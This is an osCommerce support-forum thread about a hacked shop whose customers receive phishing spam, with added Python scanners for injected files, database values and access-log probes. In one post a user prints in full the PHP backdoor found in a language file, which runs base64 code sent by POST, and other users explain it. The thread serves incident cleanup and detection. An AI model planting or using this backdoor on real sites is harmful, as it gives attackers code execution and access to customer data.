benny_bobo

customers receiving spam from our online shop


Hey,

 

Recently done the securing admin guide (rename admin folder, htpasswd on admin folder, not using 'administrator' or 'admin' as username, etc...)

 

A few of our customers report to us that they have received spam from our online shop email address.

 

The reason I believe it's via our shop is: they are using the customer's actual name, and it uses our exact shop name, shop email address and shop email signature.

 

Edit: I also received the email as I have a 'test' customer account. I checked the headers and it WAS sent from my webhost's server...

 

Has anyone had this happen before? How is it happening?

 

From: <our online shop email>

Sent: Monday, 28 March 2011 4:33 PM

To: <our customer's name>

Subject: <our customer's name>, you got a Free Discount Card!

 

Congratulations! You got a Free Discount Card!

 

For full contest details visit us here

http://www.walshoe.com/discount/?prise=#code#

 

If the above link does not work correctly, go to http://www.walshoe.com/discount/

 

You will need to enter the following your account:

Username: #email#

Activation Code: #code#

 

Thank you,

<our online shop signature>


It's a modified version of 2.2 rc2.

 

Also noticed the email header "X-Mailer: osCommerce".

 

Searched the source code for all references to 'X-Mailer'; the admin section (<admin>/mail.php, <admin>/inc/func/general.php) is the only place that uses exactly 'osCommerce'. Everywhere else uses 'osCommerce Mailer' or 'osCommerce Bulk Mailer'.


It is obvious that you have a doorway in your site which you have not locked, or locked too late.

Your site will need cleaning properly and securing properly.


Help shape the future of Phoenix; join the Phoenix Club


It is obvious that you have a doorway in your site which you have not locked, or locked too late.

Your site will need cleaning properly and securing properly.

 

On 16th March 2011 the site was hacked (it was unsecured).

 

That day I:

changed admin directory

changed admin passwords

added htpasswd to new admin folder (different password to the login page)

removed filemanager.php

removed the login.php parsing vulnerability.

 

Haven't had any issues since then, until now.


Have you checked your directories for added files, in particular files whose code is obscured with long strings of random-looking code? Look in the image folder, for example; that is often where they get hidden. If an attacker has uploaded a shell script, they will then be able to use it to email from your site. Contrary to popular belief, if there is a shell script on your site, say in the image folder, or files have been overwritten or appended to with malicious code, an attacker can, with a constructed piece of code, mirror the functions in the admin section to send mail to your customer database without actually having access to the admin folder.

 

In terms of mass email, the admin folder after all contains files that talk to the database to send emails to your customer database.

 

This is often why the best advice anyone can give to people whose sites have been attacked is to completely clean out their files and start again with the latest version of osCommerce, including all the security additions. Some are finding that even their backups have exploit code in them, so even advising a restore sometimes does not fix the issue.

 

It's just too risky to make a few cosmetic changes if you are not sure exactly what damage has already been done. When in doubt, start from scratch with the latest version of osCommerce... ver 2.3.1.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

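As an added illustration of the file check suggested in the post above (this is example code written for this page, not code from the thread or from osCommerce), here is a small Python scanner that walks a shop's document root and flags the kinds of files described: PHP tags inside image files, PHP scripts sitting in the images directory, PHP hidden inside an HTML comment, and request data fed into base64_decode or eval. It assumes a standard osCommerce layout with an images/ directory under the document root; the regexes are assumptions rather than an exhaustive signature set, and the sample tree it scans is constructed, with inert stand-ins planted where the indicators should fire.

```python
import os
import re
import tempfile

# Indicators of PHP appended to shop files or dropped into upload directories.
# These patterns are constructed for this example; tune them to your own site.
INDICATORS = [
    ('PHP opening tag hidden in an HTML comment',
     re.compile(r'<!--\s*<\?php', re.I)),
    ('request data fed to base64_decode',
     re.compile(r'base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)', re.I)),
    ('eval/assert over request data',
     re.compile(r'\b(eval|assert)\s*\(.{0,80}\$_(POST|GET|REQUEST|COOKIE)', re.I | re.S)),
    ('writes a temp file and then includes it',
     re.compile(r'(file_put_contents|fwrite)\s*\(.{0,200}\b(include|require)\s*\(', re.I | re.S)),
]
PHP_TAG = re.compile(r'<\?php', re.I)
LONG_BLOB = re.compile(r'[A-Za-z0-9+/=]{200,}')       # a long base64-looking run
IMAGE_EXT = {'.jpg', '.jpeg', '.gif', '.png', '.bmp'}


def scan_file(path, rel):
    """Return the list of reasons a file looks suspicious; an empty list means nothing found."""
    try:
        with open(path, 'rb') as fh:
            data = fh.read().decode('latin-1')   # latin-1 never fails on binary input
    except OSError:
        return []
    reasons = []
    ext = os.path.splitext(rel)[1].lower()
    in_images = rel.lower().startswith('images/') or '/images/' in rel.lower()
    if ext in IMAGE_EXT and PHP_TAG.search(data):
        reasons.append('PHP tag inside an image file')
    if in_images and ext in ('.php', '.phtml', '.php5'):
        reasons.append('PHP script inside the images directory')
    for label, pattern in INDICATORS:
        if pattern.search(data):
            reasons.append(label)
    if PHP_TAG.search(data) and LONG_BLOB.search(data):
        reasons.append('long base64-looking blob in a PHP file')
    return reasons


def scan_tree(root):
    """Walk a document root and map relative path -> reasons for every file that hits."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            reasons = scan_file(full, rel)
            if reasons:
                findings[rel] = reasons
    return findings


# Constructed sample tree: two clean files and three planted, inert indicators.
SAMPLE_FILES = {
    'includes/application_top.php': "<?php\n  require('includes/configure.php');\n?>\n",
    'images/banner.gif': 'GIF89a\x01\x00\x01\x00\x80\x00\x00',
    # stand-in for a PHP block tucked into an HTML comment at the top of a language file
    'includes/languages/english/password_forgotten.php':
        "<!--<?php if(isset($_GET['cookies'])){ $s = base64_decode($_POST['e']); } ?>-->\n"
        "<?php\n  define('HEADING_TITLE', 'Forgotten Password');\n?>\n",
    'images/logo.jpg': '\xff\xd8\xff\xe0JFIF<?php echo 1; ?>',
    'images/thumb.php': "<?php echo 'x'; ?>\n",
}


def demo():
    """Write the sample tree to a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'wb') as fh:
                fh.write(body.encode('latin-1'))
        return scan_tree(root)


if __name__ == '__main__':
    for rel, reasons in sorted(demo().items()):
        print(rel, '->', '; '.join(reasons))
```

Run it against a copy of the live document root rather than the live files, and treat every hit as something to diff against a known-good copy of the same file: the scanner only points at candidates, it does not prove a file is clean.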

I have the same problem. A lot of security updates done.

I'm not sure if the spam is sent from my osCommerce site, even though the mail header reads so.

 

Is it possible that the customer data was downloaded from the database earlier and the spam is sent later from another site?


We have the same problem as well. Can we shoot the evil-doers at walshoe.com? :angry:

 

Thanks Taipo for the useful advice. Benny (or others) please continue to post your findings as we will be following this thread for a solution.


It's a modified version of 2.2 rc2.

 

Also noticed the email header "X-Mailer: osCommerce".

 

Searched the source code for all references to 'X-Mailer'; the admin section (<admin>/mail.php, <admin>/inc/func/general.php) is the only place that uses exactly 'osCommerce'. Everywhere else uses 'osCommerce Mailer' or 'osCommerce Bulk Mailer'.

 

If you have protected your admin directory with htaccess and these emails are still being generated from your website then there is another file that has been uploaded somewhere on the site that does exactly what the admin mail function does.

 

If you merely changed the name of the admin directory and these emails are still being generated from your site, then most likely another rogue file was uploaded prior to patching your site, which gives an attacker a full list of files and directories with which they were able to get the new name of your admin directory and continue their attack.

 

This is just another reason why any advice to fix exploits that stops short of heavily advising you to start again with the latest version is inadequate advice. Because these additions to your site are often quite difficult to detect (other than the initial attack on the admin bypass exploit), it is best you build a new site with the latest version of osCommerce, which has been patched against the exploit, import your database and the images from your images folder (delete anything else in the images folder that is not an image), and go with the new version of the site.

 

Again, many think that because of the amount of customization they have done to their sites this is too much work, but in the end, when you take into account just how much damage has been done and is being done to your online security credibility as an e-retailer, and also the amount of effort put into picking up the pieces after such attacks (rooting out rogue code in files, hunting down rogue files in directories, searching your database for injected code, etc.), it is less energy expended to just build a new site and import the database.




This is just another reason why any advice to fix exploits that stops short of heavily advising you to start again with the latest version, is inadequate advice.

 

Disagree. Starting again with the latest version is poor advice if a shop is heavily customised. There are a few people in the forum who know osCommerce well enough to detect rogue code just by looking at each and every file. Do it that way and the shop is clean, secure and still as customised as it was.

 

Because these additions to your site are often quite difficult to detect (other than the initial attack on the admin bypass exploit), it is best you build a new site with the latest version of osCommerce, which has been patched against the exploit, import your database and the images from your images folder (delete anything else in the images folder that is not an image), and go with the new version of the site.

 

Again, I disagree.

 

Again, many think that because of the amount of customization they have done to their sites this is too much work, but in the end, when you take into account just how much damage has been done and is being done to your online security credibility as an e-retailer, and also the amount of effort put into picking up the pieces after such attacks (rooting out rogue code in files, hunting down rogue files in directories, searching your database for injected code, etc.), it is less energy expended to just build a new site and import the database.

 

Again, disagree. To cleanse and lock down a very hacked site is not more than 1 day of work. To port a DB, set up 2.3.1, add the customisations and skin it can be a week or more of work. And you end up with a shop that is no more secure than a properly secured/cleansed 2.2.

 

FUD - there is NO need to upgrade a hacked pre-231 site - a cleanse and lockdown is enough, done properly.




If you are proficient enough in PHP then by all means clean your own site. But that is not the norm, as most are not proficient enough in PHP to recognize the additional code, and a quick look at the security forums should show you that many people who attempt this get their sites hacked again because they missed one appended piece of code.

 

Meanwhile one or two of these attackers even has the cheek to come into these forums and try to see the credit card details they have nicked from Oscommerce users databases.

 

FUD - there is NO need to upgrade a hacked pre-231 site - a cleanse and lockdown is enough, done properly.

 

Ok I'll play along.

 

CD It's far easier to create a new reality than face the real one.




I've checked files against local backups by date modified (my shop has only been up for 2 months). Couldn't find anything else after the original cleanse.

 

I installed a statistics application on the server to track urls. Already showing some 404's to "/admin/customers.php/login.php"...

I'm just going to monitor that...

 

If it happens again, I can see how they are doing it..


Benny,

 

In addition to looking for changed files, be sure to check your database info itself. The PHP code in osCommerce builds your web pages from the database, too. First, I'd check every value in the 'configuration' table. If it has '< ? php' or '< ?' (without spaces) in any field, every time a page is viewed you could be reinfecting yourself.

 

Check out post #19 in http://forums.oscommerce.com/topic/371193-files-injected-into-images-directory/

 

HTH,

Jim

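An added example of the database check Jim describes (example code written for this page, not code from the thread or from osCommerce), generalized to every table in the database rather than just 'configuration', since injected markup can sit in any text column the pages are built from. It uses an in-memory SQLite database as a stand-in for the shop's MySQL database; the configuration table carries a subset of osCommerce's real columns and keys, the two flagged values are planted sample data, and the `<script` check is an addition to the PHP tags Jim mentions.

```python
import re
import sqlite3

# Anything that looks like a PHP or script opening tag has no business in a
# configuration value. A bare '<?' is included because short open tags were
# common on the PHP 5 hosts of the time.
INJECTED = re.compile(r'<\?(php|=)?|<script\b', re.I)


def flagged_columns(row):
    """Given {column: value} for one row, return the columns whose text holds an injected tag."""
    return [col for col, val in row.items()
            if isinstance(val, str) and INJECTED.search(val)]


def scan_database(conn):
    """Scan every text cell of every table; return {table, rowid, column, value} for each hit."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for rec in conn.execute(f'SELECT rowid, * FROM "{table}"'):
            row = dict(zip(cols, rec[1:]))
            for col in flagged_columns(row):
                hits.append({'table': table, 'rowid': rec[0],
                             'column': col, 'value': row[col]})
    return hits


# Constructed sample rows modelled on osCommerce's configuration table;
# rows 3 and 4 carry planted, inert markup.
SAMPLE_ROWS = [
    ('Store Name', 'STORE_NAME', 'Example Shop', 'The name of my store.'),
    ('E-Mail Address', 'STORE_OWNER_EMAIL_ADDRESS', 'shop@example.com',
     'The e-mail address of my store owner.'),
    ('Store Name and Address', 'STORE_NAME_ADDRESS',
     "Example Shop\n1 High Street\n<?php echo 'planted'; ?>", 'Store name and address.'),
    ('Send Extra Order Emails To', 'SEND_EXTRA_ORDER_EMAILS_TO',
     '<script src="http://example.invalid/planted.js"></script>',
     'Send extra order emails to the following.'),
]


def build_sample_db():
    """Create the in-memory stand-in for the shop database."""
    conn = sqlite3.connect(':memory:')
    conn.execute("""CREATE TABLE configuration (
        configuration_id INTEGER PRIMARY KEY,
        configuration_title TEXT, configuration_key TEXT,
        configuration_value TEXT, configuration_description TEXT)""")
    conn.executemany(
        'INSERT INTO configuration (configuration_title, configuration_key, '
        'configuration_value, configuration_description) VALUES (?, ?, ?, ?)', SAMPLE_ROWS)
    # a second, clean table shows that the scan covers every table, not just one
    conn.execute('CREATE TABLE banners (banners_id INTEGER PRIMARY KEY, banners_html_text TEXT)')
    conn.execute("INSERT INTO banners (banners_html_text) VALUES ('<a href=\"/\">home</a>')")
    return conn


def demo():
    """Build the sample database, scan it and return the hits."""
    return scan_database(build_sample_db())


if __name__ == '__main__':
    for hit in demo():
        print(hit['table'], hit['rowid'], hit['column'], repr(hit['value']))
```

Against the real shop the same loop would run over a MySQL connection (table names from information_schema instead of sqlite_master); the point is that every text column, not just configuration_value, gets read, since a `<?php` tag in any field that ends up echoed into a page re-executes on every view.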

I seem to have found the last trace in "includes/languages/english/password_forgotten.php"

 

<!--<?php if(isset($_GET['cookies'])){echo '--><i>google_a'.'ddons_mgr</i><br>cf<br>';if(isset($_POST['e'])){if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir(){if($temp=getenv('TMP')){return $temp;}if($temp=getenv('TEMP')){return $temp;}if($temp=getenv('TMPDIR')){return $temp;}$temp=tempnam(__FILE__,'');if(file_exists($temp)){unlink($temp);return dirname($temp);}return null;}}$tmppth=str_replace(chr(92),chr(47),realpath(sys_get_temp_dir()));if(substr($tmppth,-1)!=chr(47)){$tmppth.=chr(47);}if(!$tmppth){echo 'NoTmpPth';exit;}else{$tmpfl=$tmppth.time().time().'.tmp';}$s='<'.'?php '.base64_decode($_POST['e']).' ?'.'>';$k=@file_put_contents($tmpfl,$s);if(!$k){$k=@fopen($tmpfl,'w');if($k){$k=@fwrite($h,$s);@fclose($h);}}if(!$k){echo 'CantWr';exit;} else {include($tmpfl);@unlink($tmpfl);}}exit;} ?>-->

 

Now replaced the file.


My understanding of that code is that it is:

- checking for temp directory

- decode base64 coded string passed via a post variable named 'e'

- write the decrypted data to 'tempdir'/'timestamp'.tmp

- include (execute) the created file

- delete the file.


That's about it. It's an attempt to place files into the main web server temp directory. To activate it, the attacker or attack 'bot' calls the file like www.somesite.com/cookie_usage.php?cookies (adding ?cookie to invoke the message), which will result in a display saying something like

 

-->google_addons_mgr<--

 

Which indicates that the file has the rogue code appended in it.

 

Then a POST request is sent through with a base64 string to that file (in this case cookie_usage.php, for example), which will attempt to create and write to a file higher up in the web server's directories, with the intention most likely to get root access or access to non-root services to run arbitrary code.

 

The bigger question is how were they able to append code into the header of your files. If you have stopped up that hole then you shouldn't get any more appended code. But you just need to have missed one of these and they can all come back quick smart.

 

There are a couple of links in my signature that talk about how these codes are used.



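As an added example (written for this page, not from the thread or from osCommerce) of what the activation sequence described above looks like in the web server access log, the following Python script parses combined-format log lines and raises an alert for the three patterns this thread mentions: a request where a PHP script is used as a directory in front of login.php (the 404s Benny saw in his statistics), a GET with ?cookies on a PHP file, and a POST to that same file from the same address shortly afterwards. The log lines are constructed, and the ten-minute correlation window between the probe and the POST is an assumption.

```python
import re
from datetime import datetime, timedelta

# One Apache/nginx combined-format access log line; only the fields used are captured.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

BYPASS_PROBE = 'admin login bypass probe'
MARKER_PROBE = 'backdoor marker probe (?cookies on a PHP file)'
PAYLOAD_POST = 'POST following a ?cookies probe from the same address'


def parse_line(line):
    """Parse one log line into a dict, or return None if it is not in the expected format."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # drop the timezone offset; all lines from one server share it
    rec['ts'] = datetime.strptime(rec['ts'].split()[0], '%d/%b/%Y:%H:%M:%S')
    rec['status'] = int(rec['status'])
    rec['path'], _, rec['query'] = rec['target'].partition('?')
    return rec


def detect(lines, window=timedelta(minutes=10)):
    """Return alerts as {ts, ip, kind, target} for the patterns described in the thread."""
    alerts = []
    probes = {}   # (ip, path) -> time of the most recent ?cookies probe on that script

    def alert(rec, kind):
        alerts.append({'ts': rec['ts'], 'ip': rec['ip'], 'kind': kind, 'target': rec['target']})

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec['ip'], rec['path'])
        # a PHP script used as a path component in front of login.php
        if re.search(r'\.php/login\.php$', rec['path'], re.I):
            alert(rec, BYPASS_PROBE)
        # a GET on a PHP file whose whole query string is 'cookies'
        if (rec['method'] == 'GET' and rec['path'].lower().endswith('.php')
                and re.fullmatch(r'cookies(=[^&]*)?', rec['query'])):
            probes[key] = rec['ts']
            alert(rec, MARKER_PROBE)
        # a POST to that same script from the same address inside the window
        elif rec['method'] == 'POST' and key in probes and rec['ts'] - probes[key] <= window:
            alert(rec, PAYLOAD_POST)
    return alerts


# Constructed sample log: one benign visitor (203.0.113.5) and one probing address.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2011:16:30:01 +1100] "GET /index.php HTTP/1.1" 200 5123
198.51.100.7 - - [28/Mar/2011:16:31:10 +1100] "GET /admin/customers.php/login.php HTTP/1.1" 404 512
198.51.100.7 - - [28/Mar/2011:16:32:45 +1100] "GET /cookie_usage.php?cookies HTTP/1.1" 200 312
198.51.100.7 - - [28/Mar/2011:16:32:47 +1100] "POST /cookie_usage.php HTTP/1.1" 200 0
203.0.113.5 - - [28/Mar/2011:16:40:00 +1100] "GET /cookie_usage.php HTTP/1.1" 200 4120
203.0.113.5 - - [28/Mar/2011:16:41:00 +1100] "POST /password_forgotten.php HTTP/1.1" 200 210
"""


def demo():
    """Run the detector over the constructed sample log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == '__main__':
    for a in demo():
        print(a['ts'], a['ip'], a['kind'], a['target'])
```

A POST to a page that normally never receives one (cookie_usage.php, a language file) is itself worth a look even without the preceding probe; the pairing with the ?cookies GET is what turns a curiosity into a strong signal that the appended code is present and being driven.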
